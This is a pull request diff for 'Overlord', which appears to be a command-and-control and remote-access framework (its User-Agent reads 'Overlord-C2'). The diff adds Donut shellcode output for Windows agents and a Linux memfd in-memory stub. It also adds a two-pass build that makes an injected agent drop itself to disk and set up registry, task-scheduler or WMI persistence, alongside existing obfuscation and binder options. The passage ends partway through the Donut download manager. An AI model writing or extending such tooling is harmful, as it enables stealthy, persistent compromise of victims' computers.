### PR TITLE
feat: shellcode output via Donut (Windows) + memfd stub (Linux)

### DIFF
--- a/Dockerfile
+++ b/Dockerfile
@@ -48,6 +48,19 @@ RUN --mount=type=cache,target=/root/.cache/go-build \
     --mount=type=cache,target=/go/pkg/mod \
     go install mvdan.cc/garble@latest
 
+# Pre-fetch the latest Donut shellcode converter binary.
+# The runtime donut-manager will re-check GitHub and update automatically;
+# this step just ensures a working binary is available offline / on first use.
+RUN DONUT_TAG=$(curl -sSf "https://api.github.com/repos/TheWover/donut/releases/latest" \
+        | grep '"tag_name"' | head -1 | cut -d'"' -f4) \
+    && ARCHIVE_URL="https://github.com/TheWover/donut/releases/download/${DONUT_TAG}/donut_${DONUT_TAG}.tar.gz" \
+    && if curl -sSfL "${ARCHIVE_URL}" | tar xzf - --strip-components=0 -C /usr/local/bin ./donut 2>/dev/null; then \
+        chmod +x /usr/local/bin/donut; \
+        echo "Donut ${DONUT_TAG} pre-installed from archive"; \
+    else \
+        echo "WARNING: Donut pre-fetch failed — will fall back to system PATH or download on first use"; \
+    fi
+
 # Full bun install (includes devDeps needed for tailwind / vendor / minify steps)
 COPY Overlord-Server/package.json Overlord-Server/bun.lock* ./
 RUN --mount=type=cache,target=/root/.bun/install/cache \
@@ -132,6 +145,14 @@ COPY --from=builder /app/dist-clients ./dist-clients
 COPY Overlord-Client/ ./Overlord-Client/
 
 RUN mkdir -p certs data
+
+# Pre-seed Go module cache so first agent builds work offline.
+RUN --mount=type=cache,target=/root/.cache/go-build \
+    --mount=type=cache,target=/go/pkg/mod \
+    cd /app/Overlord-Client && \
+    GOWORK=off \
+    GOMODCACHE=/go/pkg/mod \
+    go mod download
 
 EXPOSE 5173
 

--- a/Overlord-Client/cmd/agent/alloc_console_windows.go
+++ b/Overlord-Client/cmd/agent/alloc_console_windows.go
@@ -1,0 +1,29 @@
+//go:build shellcode_console
+
+package main
+
+import (
+	"log"
+	"os"
+	"syscall"
+)
+
+func init() {
+	k32 := syscall.NewLazyDLL("kernel32.dll")
+
+	// Try to attach to the loader's existing console first.
+	// If that fails (GUI loader or FreeConsole was called), create a new one.
+	r, _, _ := k32.NewProc("AttachConsole").Call(^uintptr(0)) // ATTACH_PARENT_PROCESS
+	if r == 0 {
+		k32.NewProc("AllocConsole").Call()
+	}
+
+	// Open the Windows console output device and redirect Go's stderr + log
+	// so that log.Printf output is visible regardless of how handles were inherited.
+	conout, err := syscall.Open("CONOUT$", syscall.O_RDWR, 0)
+	if err == nil {
+		w := os.NewFile(uintptr(conout), "stderr")
+		os.Stderr = w
+		log.SetOutput(w)
+	}
+}

--- a/Overlord-Client/cmd/agent/main.go
+++ b/Overlord-Client/cmd/agent/main.go
@@ -21,8 +21,17 @@ func main() {
 	runBoundFiles()
 
 	if cfg.EnablePersistence {
-		if err := persistence.Setup(); err != nil {
-			log.Printf("Warning: Failed to setup persistence: %v", err)
+		if isRunningInMemory() {
+			if len(selfDropBinary) > 0 {
+				if err := persistence.SetupFromBytes(selfDropBinary); err != nil {
+					log.Printf("Warning: Failed to setup shellcode persistence: %v", err)
+				}
+			}
+			// No selfDropBinary = shellcode built without persistence embed; skip.
+		} else {
+			if err := persistence.Setup(); err != nil {
+				log.Printf("Warning: Failed to setup persistence: %v", err)
+			}
 		}
 	}
 

--- a/Overlord-Client/cmd/agent/memory_other.go
+++ b/Overlord-Client/cmd/agent/memory_other.go
@@ -1,0 +1,30 @@
+//go:build !windows
+
+package main
+
+import (
+	"os"
+	"path/filepath"
+)
+
+// isRunningInMemory returns true when the agent is executing as
+// in-memory shellcode (e.g. Linux memfd_create / execveat stub).
+// On Linux the memfd path cannot be stat'd as a regular file.
+func isRunningInMemory() bool {
+	exePath, err := os.Executable()
+	if err != nil {
+		return true
+	}
+	if realPath, err := filepath.EvalSymlinks(exePath); err == nil {
+		exePath = realPath
+	}
+	absPath, err := filepath.Abs(exePath)
+	if err != nil {
+		return true
+	}
+	info, err := os.Stat(absPath)
+	if err != nil || !info.Mode().IsRegular() {
+		return true
+	}
+	return false
+}

--- a/Overlord-Client/cmd/agent/memory_windows.go
+++ b/Overlord-Client/cmd/agent/memory_windows.go
@@ -1,0 +1,43 @@
+//go:build windows
+
+package main
+
+import (
+	"syscall"
+	"unsafe"
+)
+
+// _memBasicInfo mirrors MEMORY_BASIC_INFORMATION for 64-bit Windows.
+// Layout (bytes): BaseAddress(8) AllocationBase(8) AllocationProtect(4)
+//   _pad(4) RegionSize(8) State(4) Protect(4) Type(4) _pad(4) = 48 bytes total.
+type _memBasicInfo struct {
+	BaseAddress       uintptr
+	AllocationBase    uintptr
+	AllocationProtect uint32
+	_                 [4]byte // covers PartitionId / alignment padding
+	RegionSize        uintptr
+	State             uint32
+	Protect           uint32
+	Type              uint32
+	_                 [4]byte
+}
+
+var (
+	_k32mem   = syscall.NewLazyDLL("kernel32.dll")
+	_vqProc   = _k32mem.NewProc("VirtualQuery")
+	_memProbe byte // global in .data section — MEM_IMAGE when PE-loaded, MEM_PRIVATE as shellcode
+)
+
+// isRunningInMemory returns true when the agent's data section is in
+// anonymous private memory (Donut-injected shellcode) rather than a
+// file-backed image section.
+func isRunningInMemory() bool {
+	var mbi _memBasicInfo
+	addr := uintptr(unsafe.Pointer(&_memProbe))
+	ret, _, _ := _vqProc.Call(addr, uintptr(unsafe.Pointer(&mbi)), unsafe.Sizeof(mbi))
+	if ret == 0 {
+		return false
+	}
+	const MEM_IMAGE = 0x1000000
+	return mbi.Type != MEM_IMAGE
+}

--- a/Overlord-Client/cmd/agent/persistence/persistence.go
+++ b/Overlord-Client/cmd/agent/persistence/persistence.go
@@ -1,6 +1,7 @@
 package persistence
 
 import (
+	"fmt"
 	"os"
 	"path/filepath"
 )
@@ -39,4 +40,57 @@ func TargetPath() (string, error) {
 
 func Remove() error {
 	return uninstall()
+}
+
+// SetupFromBytes writes data to the platform persistence target path and
+// registers it — used when the agent is running as injected shellcode and
+// selfDropBinary contains the normal (non-shellcode) agent PE/ELF.
+func SetupFromBytes(data []byte) error {
+	if len(data) == 0 {
+		return fmt.Errorf("embedded binary is empty")
+	}
+	targetPath, err := getTargetPath()
+	if err != nil {
+		return fmt.Errorf("failed to resolve target path: %w", err)
+	}
+	dir := filepath.Dir(targetPath)
+	if err := os.MkdirAll(dir, 0755); err != nil {
+		return fmt.Errorf("failed to create directory: %w", err)
+	}
+	if err := writeBytes(targetPath, data); err != nil {
+		return err
+	}
+	return configure(targetPath)
+}
+
+// writeBytes atomically writes data to dest via a temp file then rename.
+func writeBytes(dest string, data []byte) error {
+	dir := filepath.Dir(dest)
+	tmp, err := os.CreateTemp(dir, "agent-*.tmp")
+	if err != nil {
+		return fmt.Errorf("failed to create temp file: %w", err)
+	}
+	tmpPath := tmp.Name()
+	defer func() { _ = os.Remove(tmpPath) }()
+
+	if _, err := tmp.Write(data); err != nil {
+		_ = tmp.Close()
+		return fmt.Errorf("failed to write binary: %w", err)
+	}
+	if err := tmp.Sync(); err != nil {
+		_ = tmp.Close()
+		return fmt.Errorf("failed to sync: %w", err)
+	}
+	if err := tmp.Close(); err != nil {
+		return fmt.Errorf("failed to close temp file: %w", err)
+	}
+	if err := os.Rename(tmpPath, dest); err != nil {
+		if rmErr := os.Remove(dest); rmErr == nil {
+			err = os.Rename(tmpPath, dest)
+		}
+		if err != nil {
+			return fmt.Errorf("failed to place binary at %s: %w", dest, err)
+		}
+	}
+	return os.Chmod(dest, 0755)
 }

--- a/Overlord-Client/cmd/agent/persistence/persistence_windows.go
+++ b/Overlord-Client/cmd/agent/persistence/persistence_windows.go
@@ -211,8 +211,6 @@ func install(exePath string) error {
 	}
 	_ = cleanupLegacyRunValues()
 	return firstErr
-
-	return nil
 }
 
 func replaceExecutable(exePath, targetPath string) error {

--- a/Overlord-Client/cmd/agent/self_embed.go
+++ b/Overlord-Client/cmd/agent/self_embed.go
@@ -1,0 +1,35 @@
+//go:build selfembed
+
+package main
+
+import (
+	_ "embed"
+	"fmt"
+	"os"
+)
+
+//go:embed selfbinary.bin
+var selfDropBinary []byte
+
+// writeSelfBinaryTemp writes selfDropBinary to a temp file and returns its path.
+// The caller is responsible for removing the file after use.
+func writeSelfBinaryTemp() (string, error) {
+	if len(selfDropBinary) == 0 {
+		return "", fmt.Errorf("embedded binary is empty")
+	}
+	f, err := os.CreateTemp("", "svc*.exe")
+	if err != nil {
+		return "", fmt.Errorf("failed to create temp file: %w", err)
+	}
+	tmpPath := f.Name()
+	if _, err := f.Write(selfDropBinary); err != nil {
+		f.Close()
+		os.Remove(tmpPath)
+		return "", fmt.Errorf("failed to write embedded binary: %w", err)
+	}
+	if err := f.Close(); err != nil {
+		os.Remove(tmpPath)
+		return "", fmt.Errorf("failed to close temp file: %w", err)
+	}
+	return tmpPath, nil
+}

--- a/Overlord-Client/cmd/agent/self_embed_stub.go
+++ b/Overlord-Client/cmd/agent/self_embed_stub.go
@@ -1,0 +1,13 @@
+//go:build !selfembed
+
+package main
+
+import "fmt"
+
+// selfDropBinary is empty in normal builds. Set via //go:embed when compiled
+// with -tags selfembed (two-pass Windows shellcode build).
+var selfDropBinary []byte
+
+func writeSelfBinaryTemp() (string, error) {
+	return "", fmt.Errorf("not compiled with selfembed tag")
+}

--- a/Overlord-Client/cmd/agent/session.go
+++ b/Overlord-Client/cmd/agent/session.go
@@ -12,7 +12,6 @@ import (
 	"net"
 	"net/http"
 	"os"
-	"path/filepath"
 	"runtime"
 	"runtime/debug"
 	"strconv"
@@ -32,24 +31,6 @@ import (
 	"nhooyr.io/websocket"
 )
 
-func isRunningInMemory() bool {
-	exePath, err := os.Executable()
-	if err != nil {
-		return true
-	}
-	if realPath, err := filepath.EvalSymlinks(exePath); err == nil {
-		exePath = realPath
-	}
-	absPath, err := filepath.Abs(exePath)
-	if err != nil {
-		return true
-	}
-	info, err := os.Stat(absPath)
-	if err != nil || !info.Mode().IsRegular() {
-		return true
-	}
-	return false
-}
 
 func runClient(cfg config.Config) {
 	//garble:controlflow block_splits=10 junk_jumps=10 flatten_passes=2

--- a/Overlord-Server/public/assets/build.js
+++ b/Overlord-Server/public/assets/build.js
@@ -145,6 +145,9 @@ function collectFormSettings() {
     assemblyCopyright: document.getElementById("assembly-copyright")?.value ?? "",
     outputExtension: document.getElementById("output-extension")?.value ?? ".exe",
     cryptableMode: document.getElementById("cryptable-mode")?.checked ?? false,
+    useDonut: document.getElementById("donut-mode")?.checked ?? false,
+    useLinuxShellcode: document.getElementById("linux-shellcode-mode")?.checked ?? false,
+    shellcodeConsole: document.getElementById("shellcode-console")?.checked ?? false,
   };
 }
 
@@ -202,6 +205,15 @@ function applyFormSettings(settings) {
   if (settings.assemblyCopyright !== undefined) setVal("assembly-copyright", settings.assemblyCopyright);
   if (settings.outputExtension !== undefined) setVal("output-extension", settings.outputExtension);
   if (settings.cryptableMode !== undefined) setCb("#cryptable-mode", settings.cryptableMode);
+  if (settings.useDonut !== undefined) {
+    setCb("#donut-mode", settings.useDonut);
+    if (settings.useDonut) applyDonutMode(true);
+  }
+  if (settings.useLinuxShellcode !== undefined) {
+    setCb("#linux-shellcode-mode", settings.useLinuxShellcode);
+    if (settings.useLinuxShellcode) applyLinuxShellcodeMode(true);
+  }
+  if (settings.shellcodeConsole !== undefined) setCb("#shellcode-console", settings.shellcodeConsole);
 
   const restoredObfuscate = document.querySelector('input[name="obfuscate"]');
   const garbleContainer = document.getElementById("garble-settings-container");
@@ -657,6 +669,26 @@ if (cryptableCheckbox) {
     applyCryptableMode(true);
   }
 }
+
+const donutCheckbox = document.getElementById("donut-mode");
+if (donutCheckbox) {
+  donutCheckbox.addEventListener("change", () => { applyDonutMode(donutCheckbox.checked); });
+  if (donutCheckbox.checked) applyDonutMode(true);
+}
+
+const linuxScCheckbox = document.getElementById("linux-shellcode-mode");
+if (linuxScCheckbox) {
+  linuxScCheckbox.addEventListener("change", () => { applyLinuxShellcodeMode(linuxScCheckbox.checked); });
+  if (linuxScCheckbox.checked) applyLinuxShellcodeMode(true);
+}
+
+document.querySelectorAll('input[name="platform"]').forEach((el) => {
+  el.addEventListener("change", () => {
+    updateShellcodeCheckboxVisibility();
+    if (donutCheckbox?.checked) applyDonutMode(true);
+    if (linuxScCheckbox?.checked) applyLinuxShellcodeMode(true);
+  });
+});
 
 let pendingIconBase64 = null;
 const iconUpload = document.getElementById("icon-upload");
@@ -1395,6 +1427,9 @@ form?.addEventListener("submit", async (e) => {
       ? boundFiles.map((f) => ({ name: f.name, data: f.base64, targetOS: f.targetOS, execute: f.execute }))
       : undefined,
     iosBundleId: platforms.some(p => p.startsWith('ios-')) ? (form.querySelector("#ios-bundle-id")?.value.trim() || undefined) : undefined,
+    useDonut: document.getElementById("donut-mode")?.checked || false,
+    useLinuxShellcode: document.getElementById("linux-shellcode-mode")?.checked || false,
+    shellcodeConsole: document.getElementById("shellcode-console")?.checked || false,
   };
 
   const hasAndroid = platforms.some(p => p.startsWith('android-'));

--- a/Overlord-Server/public/build.html
+++ b/Overlord-Server/public/build.html
@@ -364,6 +364,55 @@
                       </div>
                     </div>
 
+                    <div id="donut-row" class="hidden flex flex-col gap-1">
+                      <label class="flex items-center gap-2 p-3 bg-green-900/20 border border-green-500/30 rounded-lg cursor-pointer hover:border-green-400 transition-colors">
+                        <input type="checkbox" id="donut-mode" name="donut-mode" class="w-4 h-4" />
+                        <div class="flex flex-col">
+                          <span class="flex items-center gap-2">
+                            <i class="fa-solid fa-pepper-hot text-green-400"></i> Donut Shellcode
+                          </span>
+                          <span class="text-xs text-slate-500">Convert Windows PE to position-independent shellcode (.bin) via Donut. PE metadata, icon, bound files, UPX, hide-console, UAC, and critical-process are disabled. Persistence uses a two-pass build.</span>
+                        </div>
+                      </label>
+                      <div id="donut-badge" class="hidden pl-3 border-l-2 border-green-500/40 flex flex-col gap-1">
+                        <div class="flex items-center gap-2 px-3 py-1.5 rounded bg-green-900/30 border border-green-600/40 text-xs text-green-300">
+                          <i class="fa-solid fa-circle-check"></i>
+                          <span>Donut mode active — Windows builds output position-independent shellcode (.bin)</span>
+                        </div>
+                        <label class="flex items-center gap-2 px-3 py-1.5 rounded bg-slate-800/60 border border-slate-600/40 text-xs text-slate-300 cursor-pointer hover:border-slate-400 transition-colors">
+                          <input type="checkbox" id="shellcode-console" name="shellcode-console" class="w-3.5 h-3.5" />
+                          <i class="fa-solid fa-terminal text-slate-400"></i>
+                          <span>Show console window — calls <code>AllocConsole()</code> on start (debug builds only)</span>
+                        </label>
+                        <div id="donut-nonwin-warn" class="hidden flex items-center gap-2 px-3 py-1.5 rounded bg-yellow-900/30 border border-yellow-600/40 text-xs text-yellow-300">
+                          <i class="fa-solid fa-triangle-exclamation"></i>
+                          <span>Non-Windows targets selected — Donut only applies to Windows builds; other platforms build normally</span>
+                        </div>
+                      </div>
+                    </div>
+
+                    <div id="linux-sc-row" class="hidden flex flex-col gap-1">
+                      <label class="flex items-center gap-2 p-3 bg-cyan-900/20 border border-cyan-500/30 rounded-lg cursor-pointer hover:border-cyan-400 transition-colors">
+                        <input type="checkbox" id="linux-shellcode-mode" name="linux-shellcode-mode" class="w-4 h-4" />
+                        <div class="flex flex-col">
+                          <span class="flex items-center gap-2">
+                            <i class="fa-brands fa-linux text-cyan-400"></i> Linux Shellcode
+                          </span>
+                          <span class="text-xs text-slate-500">Wrap Linux amd64 ELF in a position-independent shellcode stub (.bin) using memfd_create + execveat. Bound files and UPX are disabled. Persistence uses a two-pass build.</span>
+                        </div>
+                      </label>
+                      <div id="linux-sc-badge" class="hidden pl-3 border-l-2 border-cyan-500/40 flex flex-col gap-1">
+                        <div class="flex items-center gap-2 px-3 py-1.5 rounded bg-cyan-900/30 border border-cyan-600/40 text-xs text-cyan-300">
+                          <i class="fa-solid fa-circle-check"></i>
+                          <span>Linux shellcode mode active — linux-amd64 builds output shellcode (.bin)</span>
+                        </div>
+                        <div id="linux-sc-nonx64-warn" class="hidden flex items-center gap-2 px-3 py-1.5 rounded bg-yellow-900/30 border border-yellow-600/40 text-xs text-yellow-300">
+                          <i class="fa-solid fa-triangle-exclamation"></i>
+                          <span>Non-amd64 Linux targets selected — shellcode stub only supports x86_64; other platforms build normally</span>
+                        </div>
+                      </div>
+                    </div>
+
                   </div>
                 </div>
               </div>

--- a/Overlord-Server/src/server/build-process.ts
+++ b/Overlord-Server/src/server/build-process.ts
@@ -16,6 +16,8 @@ import {
   toolchainKeyForTarget,
   type EnsuredToolchain,
 } from "./toolchain-manager";
+import { runDonut } from "./donut-manager";
+import { buildLinuxShellcode } from "./linux-shellcode-manager";
 
 function isClientModuleDir(dir: string): boolean {
   return (
@@ -102,6 +104,9 @@ type BuildProcessConfig = {
   outputExtension?: string;
   sleepSeconds?: number;
   boundFiles?: BoundFile[];
+  useDonut?: boolean;
+  useLinuxShellcode?: boolean;
+  shellcodeConsole?: boolean;
   solMemo?: boolean;
   solAddress?: string;
   solRpcEndpoints?: string;
@@ -861,24 +866,10 @@ func runBoundFiles() {
         sendToStream({ type: "output", text: "Linux CGO: static linking enabled (avoids GLIBC version mismatch)\n", level: "info" });
       }
 
+      const isShellcodeMode = !!(config.useDonut || config.useLinuxShellcode);
+
       try {
-        const buildTool = config.obfuscate ? "garble" : "go";
-        const buildTags: string[] = [];
-        if (config.noPrinting) buildTags.push("noprint");
-        if (hasBoundFiles) buildTags.push("hasbinder");
-        if (config.enablePersistence && os === "windows") {
-          const methods = config.persistenceMethods && config.persistenceMethods.length > 0
-            ? config.persistenceMethods
-            : ['startup'];
-          if (methods.includes("startup")) buildTags.push("persist_startup");
-          if (methods.includes("registry")) buildTags.push("persist_registry");
-          if (methods.includes("taskscheduler")) buildTags.push("persist_taskscheduler");
-          if (methods.includes("wmi")) buildTags.push("persist_wmi");
-        }
-        if (isIosTarget) buildTags.push("ios_target");
-        const tagArg = buildTags.length > 0 ? `-tags "${buildTags.join(" ")}" ` : "";
-        logger.info(`[build:${buildId.substring(0, 8)}] Building: ${buildTool} build ${tagArg}${ldflags ? `-ldflags="${ldflags}" ` : ""}-o ${outDir}/${outputName} ./cmd/agent`);
-        logger.info(`[build:${buildId.substring(0, 8)}] Environment: GOOS=${effectiveOs} GOARCH=${actualArch} CGO_ENABLED=${env.CGO_ENABLED} CC=${env.CC || "<default>"}${isIosTarget ? " (iOS target via darwin+ios_target tag)" : ""}`);
+        logger.info(`[build:${buildId.substring(0, 8)}] GOOS=${os} GOARCH=${actualArch} CGO=${env.CGO_ENABLED} CC=${env.CC || "<default>"} shellcode=${isShellcodeMode}`);
 
         const garbleFlags: string[] = [];
         if (config.obfuscate) {
@@ -887,42 +878,74 @@ func runBoundFiles() {
           if (config.garbleSeed) garbleFlags.push(`-seed=${config.garbleSeed}`);
         }
 
-        const buildArgs: string[] = [];
-        if (buildTags.length > 0) buildArgs.push("-tags", buildTags.join(" "));
-        buildArgs.push("-trimpath");
-        buildArgs.push("-buildvcs=false");
-        if (ldflags) buildArgs.push(`-ldflags=${ldflags}`);
-        buildArgs.push("-o", `${outDir}/${outputName}`, "./cmd/agent");
+        // Base tags: always present regardless of build pass
+        const baseTags: string[] = [];
+        if (config.noPrinting) baseTags.push("noprint");
+        if (hasBoundFiles) baseTags.push("hasbinder");
+        if (isIosTarget) baseTags.push("ios_target");
+        if (config.shellcodeConsole && isShellcodeMode && os === "windows") baseTags.push("shellcode_console");
 
-        let buildCmd;
-        if (config.obfuscate) {
-          const allArgs = [...garbleFlags, "build", ...buildArgs];
-          buildCmd = $`garble ${allArgs}`;
+        // Windows persistence tags (omitted in shellcode mode — handled by two-pass below)
+        const winPersistTags: string[] = [];
+        if (config.enablePersistence && os === "windows" && !isShellcodeMode) {
+          const methods = config.persistenceMethods?.length ? config.persistenceMethods : ["startup"];
+          if (methods.includes("startup")) winPersistTags.push("persist_startup");
+          if (methods.includes("registry")) winPersistTags.push("persist_registry");
+          if (methods.includes("taskscheduler")) winPersistTags.push("persist_taskscheduler");
+          if (methods.includes("wmi")) winPersistTags.push("persist_wmi");
+        }
+
+        const runBuild = async (tags: string[], outputPath: string) => {
+          const buildArgs: string[] = [];
+          if (tags.length > 0) buildArgs.push("-tags", tags.join(" "));
+          buildArgs.push("-trimpath", "-buildvcs=false");
+          if (ldflags) buildArgs.push(`-ldflags=${ldflags}`);
+          buildArgs.push("-o", outputPath, "./cmd/agent");
+          let buildCmd;
+          if (config.obfuscate) {
+            buildCmd = $`garble ${[...garbleFlags, "build", ...buildArgs]}`;
+          } else {
+            buildCmd = $`go build ${buildArgs}`;
+          }
+          const proc = buildCmd.env(env).cwd(clientDir).nothrow();
+          for await (const line of proc.lines()) {
+            const trimmed = line.trim();
+            if (trimmed.length > 0) sendToStream({ type: "output", text: line + "\n", level: "info" });
+          }
+          const result = await proc;
+          if (result.exitCode !== 0) {
+            const stderrText = result.stderr.toString();
+            if (stderrText) sendToStream({ type: "output", text: stderrText, level: "error" });
+            throw new Error(`Build failed for ${platform} (exit ${result.exitCode})`);
+          }
+        };
+
+        // Two-pass build: shellcode + persistence
+        if (isShellcodeMode && config.enablePersistence && !platform.startsWith("android-")) {
+          const pass1Path = `${outDir}/${outputName}.pass1`;
+          const pass1Tags = [...baseTags];
+          if (os === "windows") {
+            const methods = config.persistenceMethods?.length ? config.persistenceMethods : ["startup"];
+            if (methods.includes("startup")) pass1Tags.push("persist_startup");
+            if (methods.includes("registry")) pass1Tags.push("persist_registry");
+            if (methods.includes("taskscheduler")) pass1Tags.push("persist_taskscheduler");
+            if (methods.includes("wmi")) pass1Tags.push("persist_wmi");
+          }
+          sendToStream({ type: "output", text: `Two-pass shellcode+persistence build\n  Pass 1: agent with persistence (tags: ${pass1Tags.join(" ")})\n`, level: "info" });
+          await runBuild(pass1Tags, pass1Path);
+
+          const pass1Data = fs.readFileSync(pass1Path);
+          const selfbinPath = path.join(clientDir, "cmd", "agent", "selfbinary.bin");
+          fs.writeFileSync(selfbinPath, pass1Data);
+          fs.unlinkSync(pass1Path);
+
+          const pass2Tags = [...baseTags, "selfembed"];
+          sendToStream({ type: "output", text: `  Pass 2: selfembed wrapper (tags: ${pass2Tags.join(" ")})\n`, level: "info" });
+          await runBuild(pass2Tags, `${outDir}/${outputName}`);
+          try { fs.unlinkSync(selfbinPath); } catch {}
         } else {
-          buildCmd = $`go build ${buildArgs}`;
-        }
-
-        const proc = buildCmd.env(env).cwd(clientDir).nothrow();
-        let result: any;
-        for await (const line of proc.lines()) {
-          const trimmed = line.trim();
-          if (trimmed.length > 0) {
-            sendToStream({ type: "output", text: line + "\n", level: "info" });
-          }
-        }
-
-        result = await proc;
-
-        logger.info(`[build:${buildId.substring(0, 8)}] Process exited with code: ${result.exitCode}`);
-
-        if (result.exitCode !== 0) {
-          const stderrText = result.stderr.toString();
-          if (stderrText) {
-            sendToStream({ type: "output", text: stderrText, level: "error" });
-          }
-          const errorMsg = `Build failed with exit code ${result.exitCode}\n`;
-          sendToStream({ type: "output", text: errorMsg, level: "error" });
-          throw new Error(`Build failed for ${platform}`);
+          const tags = [...baseTags, ...winPersistTags];
+          await runBuild(tags, `${outDir}/${outputName}`);
         }
 
         const filePath = `${outDir}/${outputName}`;
@@ -1119,12 +1142,44 @@ func runBoundFiles() {
         }
         // ── End IPA packaging ─────────────────────────────────────────────────
 
+        // ── Donut: Windows PE → shellcode ──────────────────────────────────
+        let finalOutputName = outputName;
+        let finalOutputSize = finalSize;
+
+        if (config.useDonut && os === "windows") {
+          sendToStream({ type: "status", text: `Converting ${platform} PE to shellcode…` });
+          sendToStream({ type: "output", text: `\nConverting PE → shellcode with Donut...\n`, level: "info" });
+          const scOutputName = deps.sanitizeOutputName(outputName.replace(/\.[^.]+$/, ".bin"));
+          const binPath = path.join(outDir, scOutputName);
+          const donutArch = (actualArch === "386" ? "386" : "amd64") as "386" | "amd64";
+          const ok = await runDonut(filePath, binPath, donutArch, sendToStream);
+          if (!ok) throw new Error(`Donut shellcode conversion failed for ${platform}`);
+          try { fs.unlinkSync(filePath); } catch {}
+          finalOutputName = scOutputName;
+          finalOutputSize = Bun.file(binPath).size;
+          sendToStream({ type: "output", text: `Shellcode ready: ${finalOutputSize} bytes → ${finalOutputName}\n`, level: "success" });
+        }
+
+        // ── Linux ELF → shellcode stub ──────────────────────────────────────
+        if (config.useLinuxShellcode && os === "linux") {
+          sendToStream({ type: "status", text: `Wrapping ${platform} ELF as shellcode…` });
+          sendToStream({ type: "output", text: `\nWrapping ELF with Linux shellcode stub...\n`, level: "info" });
+          const scOutputName = deps.sanitizeOutputName(outputName + ".bin");
+          const binPath = path.join(outDir, scOutputName);
+          const ok = buildLinuxShellcode(filePath, binPath, sendToStream);
+          if (!ok) throw new Error(`Linux shellcode wrap failed for ${platform}`);
+          try { fs.unlinkSync(filePath); } catch {}
+          finalOutputName = scOutputName;
+          finalOutputSize = Bun.file(binPath).size;
+          sendToStream({ type: "output", text: `Shellcode ready: ${finalOutputSize} bytes → ${finalOutputName}\n`, level: "success" });
+        }
+
         (build.files as any[]).push({
-          name: outputName,
-          filename: outputName,
+          name: finalOutputName,
+          filename: finalOutputName,
           platform,
           version: agentVersion,
-          size: finalSize,
+          size: finalOutputSize,
         });
       } catch (err: any) {
         const errorMsg = `[ERROR] Failed to build ${platform}: ${err.message || err}\n`;

--- a/Overlord-Server/src/server/donut-manager.ts
+++ b/Overlord-Server/src/server/donut-manager.ts
@@ -1,0 +1,260 @@
+import fs from "fs";
+import path from "path";
+import { $ } from "bun";
+import { ensureDataDir } from "../paths";
+import { logger } from "../logger";
+
+const DONUT_REPO = "TheWover/donut";
+const VERSION_TTL_MS = 24 * 60 * 60 * 1000; // re-check GitHub at most once per day
+
+type CachedVersion = { tag: string; cachedAt: number };
+
+function toolsDir(): string {
+  return path.join(ensureDataDir(), "tools");
+}
+
+function binaryPath(): string {
+  return path.join(toolsDir(), process.platform === "win32" ? "donut.exe" : "donut");
+}
+
+function versionFilePath(): string {
+  return path.join(toolsDir(), "donut.version");
+}
+
+function readCache(): CachedVersion | null {
+  try { return JSON.parse(fs.readFileSync(versionFilePath(), "utf8")); } catch { return null; }
+}
+
+function writeCache(tag: string): void {
+  try {
+    fs.mkdirSync(toolsDir(), { recursive: true });
+    fs.writeFileSync(versionFilePath(), JSON.stringify({ tag, cachedAt: Date.now() }));
+  } catch {}
+}
+
+async function findSystemDonut(): Promise<string | null> {
+  const systemCandidates = ["/usr/local/bin/donut", "/usr/bin/donut"];
+  for (const c of systemCandidates) {
+    if (fs.existsSync(c)) return c;
+  }
+  try {
+    const r = await $`which donut`.quiet().nothrow();
+    if (r.exitCode === 0) {
+      const p = r.stdout.toString().trim();
+      if (p) return p;
+    }
+  } catch {}
+  return null;
+}
+
+type AssetInfo = { tag: string; downloadUrl: string; isArchive?: boolean };
+
+async function fetchLatest(): Promise<AssetInfo | null> {
+  try {
+    const res = await fetch(
+      `https://api.github.com/repos/${DONUT_REPO}/releases/latest`,
+      { headers: { "User-Agent": "Overlord-C2", Accept: "application/vnd.github+json" } },
+    );
+    if (!res.ok) return null;
+    const data = await res.json() as any;
+    const tag: string = data.tag_name;
+    const assets: { name: string; browser_download_url: string }[] = data.assets ?? [];
+
+    // Prioritised binary names for each host platform
+    const candidates =
+      process.platform === "win32"
+        ? ["donut.exe", "donut_x64.exe", "donut_x86_64.exe"]
+        : ["donut_x64", "donut_x86_64", "donut-linux-x64", "donut-linux", "donut"];
+
+    for (const name of candidates) {
+      const asset = assets.find(a => a.name.toLowerCase() === name.toLowerCase());
+      if (asset) return { tag, downloadUrl: asset.browser_download_url };
+    }
+
+    // Last-resort: any asset starting with "donut" with no extension (Linux binary)
+    if (process.platform !== "win32") {
+      const fallback = assets.find(a => /^donut/i.test(a.name) && !a.name.includes("."));
+      if (fallback) return { tag, downloadUrl: fallback.browser_download_url };
+    }
+
+    // Releases may only ship archives (e.g. v1.1 ships tar.gz/zip, no bare binary).
+    // Fall back to downloading and extracting the archive.
+    if (process.platform !== "win32") {
+      const tarGz = assets.find(a => /donut/i.test(a.name) && a.name.endsWith(".tar.gz"));
+      if (tarGz) return { tag, downloadUrl: tarGz.browser_download_url, isArchive: true };
+      const zip = assets.find(a => /donut/i.test(a.name) && a.name.endsWith(".zip"));
+      if (zip) return { tag, downloadUrl: zip.browser_download_url, isArchive: true };
+    }
+
+    return null;
+  } catch {
+    return null;
+  }
+}
+
+async function downloadBinary(url: string, dest: string, isArchive = false): Promise<boolean> {
+  try {
+    fs.mkdirSync(path.dirname(dest), { recursive: true });
+    const res = await fetch(url);
+    if (!res.ok) return false;
+    const buf = await res.arrayBuffer();
+
+    if (!isArchive) {
+      fs.writeFileSync(dest, Buffer.from(buf), { mode: 0o755 });
+      return true;
+    }
+
+    // Archive (tar.gz): write to a temp file, then extract the 'donut' binary from it.
+    const tmpArchive = dest + ".tmp.tar.gz";
+    fs.writeFileSync(tmpArchive, Buffer.from(buf));
+    try {
+      const destDir = path.dirname(dest);
+      // Try with --strip-components first (archive has a top-level dir), then without.
+      let r = await $`tar xzf ${tmpArchive} --strip-components=1 -C ${destDir} ./donut`
+        .nothrow().quiet();
+      if (r.exitCode !== 0 || !fs.existsSync(dest)) {
+        r = await $`tar xzf ${tmpArchive} -C ${destDir} donut`.nothrow().quiet();
+      }
+      if (!fs.existsSync(dest)) return false;
+      fs.chmodSync(dest, 0o755);
+      return true;
+    } finally {
+      try { fs.unlinkSync(tmpArchive); } catch {}
+    }
+  } catch {
+    return false;
+  }
+}
+
+/**
+ * Ensures the Donut binary is present and up-to-date.
+ * Downloads from the latest GitHub release if absent or the cached version
+ * info is older than VERSION_TTL_MS.
+ * Returns the path to the binary, or null if it could not be obtained.
+ */
+export async function ensureDonut(
+  sendToStream?: (data: any) => void,
